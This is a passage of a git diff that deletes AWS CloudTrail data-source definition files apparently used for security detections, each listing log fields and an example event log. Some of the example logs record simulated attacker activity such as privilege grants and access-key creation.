- data_source: data_sources/cloud/event_sources/O365_Add_app_role_assignment_grant_to_user..yml
-- event_name: O365 Add app role assignment to service principal.
- data_source: data_sources/cloud/event_sources/O365_Add_app_role_assignment_to_service_principal..yml
-- event_name: O365 Add member to role.
- data_source: data_sources/cloud/event_sources/O365_Add_member_to_role..yml
-- event_name: O365 Add owner to application.
- data_source: data_sources/cloud/event_sources/O365_Add_owner_to_application..yml
-- event_name: O365 Add service principal.
- data_source: data_sources/cloud/event_sources/O365_Add_service_principal..yml
-- event_name: O365 Add-MailboxPermission
- data_source: data_sources/cloud/event_sources/O365_Add-MailboxPermission.yml
-- event_name: O365 Change user license.
- data_source: data_sources/cloud/event_sources/O365_Change_user_license..yml
-- event_name: O365 Consent to application.
- data_source: data_sources/cloud/event_sources/O365_Consent_to_application..yml
-- event_name: O365 Disable Strong Authentication.
- data_source: data_sources/cloud/event_sources/O365_Disable_Strong_Authentication..yml
-- event_name: O365 MailItemsAccessed
- data_source: data_sources/cloud/event_sources/O365_MailItemsAccessed.yml
-- event_name: O365 ModifyFolderPermissions
- data_source: data_sources/cloud/event_sources/O365_ModifyFolderPermissions.yml
-- event_name: O365 Set Company Information.
- data_source: data_sources/cloud/event_sources/O365_Set_Company_Information..yml
-- event_name: O365 Set-Mailbox
- data_source: data_sources/cloud/event_sources/O365_Set-Mailbox.yml
-- event_name: O365 Update application.
- data_source: data_sources/cloud/event_sources/O365_Update_application..yml
-- event_name: O365 Update authorization policy.
- data_source: data_sources/cloud/event_sources/O365_Update_authorization_policy..yml
-- event_name: O365 Update user.
- data_source: data_sources/cloud/event_sources/O365_Update_user..yml
-- event_name: O365 UserLoggedIn
- data_source: data_sources/cloud/event_sources/O365_UserLoggedIn.yml
-- event_name: O365 UserLoginFailed
- data_source: data_sources/cloud/event_sources/O365_UserLoginFailed.yml
-fields:
-- _time
-- AppAccessContext.IssuedAtTime
-- AppAccessContext.UniqueTokenId
-- AppId
-- ClientAppId
-- ClientIP
-- CreationTime
-- ExternalAccess
-- Id
-- Name
-- ObjectId
-- Operation
-- OrganizationId
-- OrganizationName
-- OriginatingServer
-- Parameters{}.Name
-- Parameters{}.Value
-- RecordType
-- RequestId
-- ResultStatus
-- Role
-- SessionId
-- User
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- status
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"AppAccessContext": {"IssuedAtTime": "2023-10-17T19:13:05", "UniqueTokenId":
- "g7oAmNhLoU-8qJVeWeAwAA"}, "CreationTime": "2023-10-17T19:19:59", "Id": "3d26a8cd-d8f4-42f9-1898-08dbcf460e5a",
- "Operation": "New-ManagementRoleAssignment", "OrganizationId": "aeb12f6b-1ff3-4a18-9ea2-29aa57e2ae08",
- "RecordType": 1, "ResultStatus": "True", "UserKey": "1003BFFD98415B4E", "UserType":
- 2, "Version": 1, "Workload": "Exchange", "ClientIP": "71.1.1.1:61528", "ObjectId":
- "splunkresearch.onmicrosoft.com\\attack-test", "UserId": "compromisedAdmin@splunkresearch.onmicrosoft.com",
- "AppId": "fb78d390-0c51-40cd-8e17-fdbfab77341b", "ClientAppId": "", "ExternalAccess":
- false, "OrganizationName": "splunkresearch.onmicrosoft.com", "OriginatingServer":
- "BYAPR18MB2408 (15.20.6863.047)", "Parameters": [{"Name": "User", "Value": "lowpriv@splunkresearch.onmicrosoft.com"},
- {"Name": "Name", "Value": "attack-test"}, {"Name": "Role", "Value": "ApplicationImpersonation"}],
- "RequestId": "53a50583-e429-63a4-c9f7-8fbb14437e8a", "SessionId": "e2a028f1-d0e1-4ddb-a5a7-ec57343457ad"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_AssumeRoleWithSAML.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_AssumeRoleWithSAML.yml
deleted file mode 100644
index a7b5023083..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_AssumeRoleWithSAML.yml
+++ /dev/null
@@ -1,92 +0,0 @@
-event_name: AWS CloudTrail AssumeRoleWithSAML
-fields:
-- _time
-- action
-- app
-- awsRegion
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.durationSeconds
-- requestParameters.principalArn
-- requestParameters.roleArn
-- requestParameters.roleSessionName
-- requestParameters.sAMLAssertionID
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements.assumedRoleUser.arn
-- responseElements.assumedRoleUser.assumedRoleId
-- responseElements.audience
-- responseElements.credentials.accessKeyId
-- responseElements.credentials.expiration
-- responseElements.credentials.sessionToken
-- responseElements.issuer
-- responseElements.nameQualifier
-- responseElements.subject
-- responseElements.subjectType
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_user
-- src_user_id
-- src_user_type
-- start_time
-- status
-- tag
-- tag::action
-- tag::eventtype
-- temp_access_key
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.identityProvider
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- user_agent
-- user_arn
-- user_id
-- user_name
-- user_role
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "SAMLUser", "principalId": "ZRu9MRAjiG9tvi1QBNfdI664G5A=:rodsoto@rodsoto.onmicrosoft.com", "userName": "rodsoto@rodsoto.onmicrosoft.com", "identityProvider": "ZRu9MRAjiG9tvi1QBNfdI664G5A="}, "eventTime": "2021-01-22T03:44:16Z", "eventSource": "sts.amazonaws.com", "eventName": "AssumeRoleWithSAML", "awsRegion": "us-east-1", "sourceIPAddress": "72.21.217.152", "userAgent": "AWS Signin, aws-internal/3 aws-sdk-java/1.11.898 Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.275-b01 java/1.8.0_275 kotlin/1.3.72 vendor/Oracle_Corporation", "requestParameters": {"sAMLAssertionID": "_d33ba0ad-0c88-4b83-80a6-27c08027d000", "roleSessionName": "rodsoto@rodsoto.onmicrosoft.com", "durationSeconds": 3600, "roleArn": "arn:aws:iam::111111111111:role/rodonmicrotestrole", "principalArn": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"}, "responseElements": {"subjectType": "urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress", "issuer": "https://sts.windows.net/0e8108b1-18e9-41a4-961b-dfcddf92ef08/", "credentials": {"accessKeyId": "ASIAYTOGP2RLKJXOV7VR", "expiration": "Jan 22, 2021 3:59:16 AM", "sessionToken": "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"}, "nameQualifier": "ZRu9MRAjiG9tvi1QBNfdI664G5A=", "assumedRoleUser": {"assumedRoleId": "AROAYTOGP2RLKFUVAQAIJ:rodsoto@rodsoto.onmicrosoft.com", "arn": "arn:aws:sts::111111111111:assumed-role/rodonmicrotestrole/rodsoto@rodsoto.onmicrosoft.com"}, "subject": "rodsoto@rodsoto.onmicrosoft.com", "audience": "https://signin.aws.amazon.com/saml"}, "requestID": "e19c7a7f-cd96-4642-9ee6-2360a7b01b12", "eventID": "b25b825d-9c9b-49d3-9ecd-290dbe8f2c29", "readOnly": true, "resources": [{"accountId": "111111111111", "type": "AWS::IAM::Role", "ARN": "arn:aws:iam::111111111111:role/rodonmicrotestrole"}, {"accountId": "111111111111", "type": "AWS::IAM::SAMLProvider", "ARN": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"}], 
"eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_ConsoleLogin.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_ConsoleLogin.yml
deleted file mode 100644
index a8d3a254c3..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_ConsoleLogin.yml
+++ /dev/null
@@ -1,80 +0,0 @@
-event_name: AWS CloudTrail ConsoleLogin
-fields:
-- _time
-- action
-- additionalEventData.LoginTo
-- additionalEventData.MFAUsed
-- additionalEventData.MobileVersion
-- app
-- authentication_method
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- desc
-- dest
-- dvc
-- errorCode
-- errorMessage
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- reason
-- recipientAccountId
-- region
-- requestParameters
-- responseElements.ConsoleLogin
-- result
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.type
-- userIdentity.userName
-- user_access_key
-- user_agent
-- user_group_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "accountId": "140429656527", "accessKeyId": "", "userName": "HIDDEN_DUE_TO_SECURITY_REASONS"}, "eventTime": "2022-10-19T20:33:38Z", "eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin", "awsRegion": "us-east-1", "sourceIPAddress": "142.254.89.27", "userAgent": "Go-http-client/1.1", "errorMessage": "No username found in supplied account", "requestParameters": null, "responseElements": {"ConsoleLogin": "Failure"}, "additionalEventData": {"LoginTo": "https://console.aws.amazon.com", "MobileVersion": "No", "MFAUsed": "No"}, "eventID": "9fcfb8c3-3fca-48db-85d2-7b107f9d95d0", "readOnly": false, "eventType": "AwsConsoleSignIn", "managementEvent": true, "recipientAccountId": "140429656527", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "signin.aws.amazon.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CopyObject.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CopyObject.yml
deleted file mode 100644
index 325bc243c7..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CopyObject.yml
+++ /dev/null
@@ -1,86 +0,0 @@
-event_name: AWS CloudTrail CopyObject
-fields:
-- _time
-- additionalEventData.AuthenticationMethod
-- additionalEventData.CipherSuite
-- additionalEventData.SSEApplied
-- additionalEventData.SignatureVersion
-- additionalEventData.bytesTransferredIn
-- additionalEventData.bytesTransferredOut
-- additionalEventData.x-amz-id-2
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.Host
-- requestParameters.bucketName
-- requestParameters.key
-- requestParameters.x-amz-copy-source
-- requestParameters.x-amz-server-side-encryption
-- requestParameters.x-amz-server-side-encryption-aws-kms-key-id
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements.x-amz-server-side-encryption
-- responseElements.x-amz-server-side-encryption-aws-kms-key-id
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLNALZHZ6KX", "arn": "arn:aws:iam::111111111111:user/patrick_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLJ2OYSF6E", "userName": "patrick_cli"}, "eventTime": "2021-01-11T12:40:47Z", "eventSource": "s3.amazonaws.com", "eventName": "CopyObject", "awsRegion": "us-west-2", "sourceIPAddress": "95.90.199.65", "userAgent": "[aws-cli/2.0.45 Python/3.7.4 Darwin/20.2.0 exe/x86_64 command/s3.cp]", "requestParameters": {"bucketName": "patricktestbucketencrypt", "x-amz-server-side-encryption-aws-kms-key-id": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1", "Host": "patricktestbucketencrypt.s3.us-west-2.amazonaws.com", "x-amz-server-side-encryption": "aws:kms", "x-amz-copy-source": "patricktestbucketencrypt/kms_aws_events.json", "key": "kms_aws_events_encrypted.json"}, "responseElements": {"x-amz-server-side-encryption": "aws:kms", "x-amz-server-side-encryption-aws-kms-key-id": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1"}, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 0.0, "SSEApplied": "SSE_KMS", "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "fqzX1iZV6ImDtkFxbGvziOE6fUwryRa+PhnLckfVAkLNHdbCAHNq4l/yckUd1a2HNJPL6NAS01U=", "bytesTransferredOut": 234.0}, "requestID": "6A7359F7A9414B02", "eventID": "b20d43de-175d-4443-acd7-f5f3e587ae00", "readOnly": false, "resources": [{"type": "AWS::S3::Object", "ARN": "arn:aws:s3:::patricktestbucketencrypt/kms_aws_events_encrypted.json"}, {"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::patricktestbucketencrypt"}, {"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::patricktestbucketencrypt"}, {"type": "AWS::S3::Object", "ARN": "arn:aws:s3:::patricktestbucketencrypt/kms_aws_events.json"}], "eventType": "AwsApiCall", 
"managementEvent": false, "recipientAccountId": "111111111111", "eventCategory": "Data"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateAccessKey.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreateAccessKey.yml
deleted file mode 100644
index c21bb5b0e1..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateAccessKey.yml
+++ /dev/null
@@ -1,80 +0,0 @@
-event_name: AWS CloudTrail CreateAccessKey
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.userName
-- responseElements.accessKey.accessKeyId
-- responseElements.accessKey.createDate
-- responseElements.accessKey.status
-- responseElements.accessKey.userName
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_user_name
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::121521347698:user/bhavin_cli", "accountId": "121521347698", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"}, "eventTime": "2021-03-02T21:18:24Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey", "awsRegion": "us-east-1", "sourceIPAddress": "12.25.72.12", "userAgent": "aws-cli/2.0.62 Python/3.9.0 Darwin/19.6.0 source/x86_64 command/iam.create-access-key", "requestParameters": {"userName": "AtomicRedTeam"}, "responseElements": {"accessKey": {"userName": "AtomicRedTeam", "accessKeyId": "AKIAYTOGP2RLOQ4ULYGT", "status": "Active", "createDate": "Mar 2, 2021 9:18:24 PM"}}, "requestID": "12c8773d-6c78-46bf-a8e4-f841adc8f70d", "eventID": "5772e8d5-cccc-470d-81ef-acacfe85a804", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "121521347698"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateKey.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreateKey.yml
deleted file mode 100644
index c9ea6d067f..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateKey.yml
+++ /dev/null
@@ -1,98 +0,0 @@
-event_name: AWS CloudTrail CreateKey
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.bypassPolicyLockoutSafetyCheck
-- requestParameters.customerMasterKeySpec
-- requestParameters.description
-- requestParameters.keyUsage
-- requestParameters.origin
-- requestParameters.policy
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements.keyMetadata.aWSAccountId
-- responseElements.keyMetadata.arn
-- responseElements.keyMetadata.creationDate
-- responseElements.keyMetadata.customerMasterKeySpec
-- responseElements.keyMetadata.description
-- responseElements.keyMetadata.enabled
-- responseElements.keyMetadata.encryptionAlgorithms{}
-- responseElements.keyMetadata.keyId
-- responseElements.keyMetadata.keyManager
-- responseElements.keyMetadata.keyState
-- responseElements.keyMetadata.keyUsage
-- responseElements.keyMetadata.origin
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLK74OPBDR", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn": "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName": "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated": "false", "creationDate": "2021-01-11T09:03:18Z"}}}, "eventTime": "2021-01-11T09:56:31Z", "eventSource": "kms.amazonaws.com", "eventName": "CreateKey", "awsRegion": "us-west-2", "sourceIPAddress": "95.90.199.65", "userAgent": "aws-internal/3 aws-sdk-java/1.11.893 Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.272-b10 java/1.8.0_272 vendor/Oracle_Corporation", "requestParameters": {"origin": "AWS_KMS", "policy": "{\n \"Id\": \"key-consolepolicy-3\",\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Sid\": \"Enable IAM User Permissions\",\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"AWS\": \"arn:aws:iam::111111111111:root\"\n },\n \"Action\": \"kms:*\",\n \"Resource\": \"*\"\n },\n {\n \"Sid\": \"Allow access for Key Administrators\",\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n },\n \"Action\": [\n \"kms:Create*\",\n \"kms:Describe*\",\n \"kms:Enable*\",\n \"kms:List*\",\n \"kms:Put*\",\n \"kms:Update*\",\n \"kms:Revoke*\",\n \"kms:Disable*\",\n \"kms:Get*\",\n \"kms:Delete*\",\n \"kms:TagResource\",\n \"kms:UntagResource\",\n \"kms:ScheduleKeyDeletion\",\n \"kms:CancelKeyDeletion\"\n ],\n \"Resource\": \"*\"\n },\n {\n \"Sid\": \"Allow use of the key\",\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n },\n \"Action\": [\n \"kms:Encrypt\",\n \"kms:Decrypt\",\n 
\"kms:ReEncrypt*\",\n \"kms:GenerateDataKey*\",\n \"kms:DescribeKey\"\n ],\n \"Resource\": \"*\"\n },\n {\n \"Sid\": \"Allow attachment of persistent resources\",\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n },\n \"Action\": [\n \"kms:CreateGrant\",\n \"kms:ListGrants\",\n \"kms:RevokeGrant\"\n ],\n \"Resource\": \"*\",\n \"Condition\": {\n \"Bool\": {\n \"kms:GrantIsForAWSResource\": \"true\"\n }\n }\n },\n {\n \"Sid\": \"Allow use of the key\",\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"AWS\": \"*\"\n },\n \"Action\": [\n \"kms:Encrypt\"\n ],\n \"Resource\": \"*\"\n }\n ]\n}", "description": "", "customerMasterKeySpec": "SYMMETRIC_DEFAULT", "bypassPolicyLockoutSafetyCheck": false, "tags": [], "keyUsage": "ENCRYPT_DECRYPT"}, "responseElements": {"keyMetadata": {"aWSAccountId": "111111111111", "keyId": "f2a82583-a7d3-4c92-8787-fe2baab1cee1", "arn": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1", "creationDate": "Jan 11, 2021, 9:56:30 AM", "enabled": true, "description": "", "keyUsage": "ENCRYPT_DECRYPT", "keyState": "Enabled", "origin": "AWS_KMS", "keyManager": "CUSTOMER", "customerMasterKeySpec": "SYMMETRIC_DEFAULT", "encryptionAlgorithms": ["SYMMETRIC_DEFAULT"]}}, "requestID": "3356af25-a237-471f-ba5e-abb37d4a256f", "eventID": "f09518ac-5ae5-4214-80ee-4f23ccdedd4c", "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::KMS::Key", "ARN": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1"}], "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateLoginProfile.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreateLoginProfile.yml
deleted file mode 100644
index c343704c7c..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateLoginProfile.yml
+++ /dev/null
@@ -1,79 +0,0 @@
-event_name: AWS CloudTrail CreateLoginProfile
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.passwordResetRequired
-- requestParameters.userName
-- responseElements.loginProfile.createDate
-- responseElements.loginProfile.passwordResetRequired
-- responseElements.loginProfile.userName
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"}, "eventTime": "2021-03-05T01:02:38Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateLoginProfile", "awsRegion": "us-east-1", "sourceIPAddress": "73.15.72.101", "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.create-login-profile", "requestParameters": {"userName": "AtomicRedTeam", "passwordResetRequired": false}, "responseElements": {"loginProfile": {"userName": "AtomicRedTeam", "createDate": "Mar 5, 2021 1:02:38 AM", "passwordResetRequired": false}}, "requestID": "f1b90364-8aed-4559-96cf-f5f2009bb7cb", "eventID": "ffb76906-6dd1-4219-adfe-e26b92036a1e", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateNetworkAclEntry.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreateNetworkAclEntry.yml
deleted file mode 100644
index 944e4e332e..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateNetworkAclEntry.yml
+++ /dev/null
@@ -1,95 +0,0 @@
-event_name: AWS CloudTrail CreateNetworkAclEntry
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- direction
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object
-- object_category
-- object_id
-- product
-- protocol
-- protocol_code
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.aclProtocol
-- requestParameters.cidrBlock
-- requestParameters.egress
-- requestParameters.networkAclId
-- requestParameters.ruleAction
-- requestParameters.ruleNumber
-- responseElements._return
-- responseElements.requestId
-- rule_action
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_ip_range
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLF3F7BXZK", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn": "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName": "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated": "false", "creationDate": "2021-01-12T08:36:15Z"}}}, "eventTime": "2021-01-12T08:38:39Z", "eventSource": "ec2.amazonaws.com", "eventName": "CreateNetworkAclEntry", "awsRegion": "eu-central-1", "sourceIPAddress": "95.90.199.65", "userAgent": "console.ec2.amazonaws.com", "requestParameters": {"networkAclId": "acl-078ccebebcbabe175", "ruleNumber": 10, "egress": false, 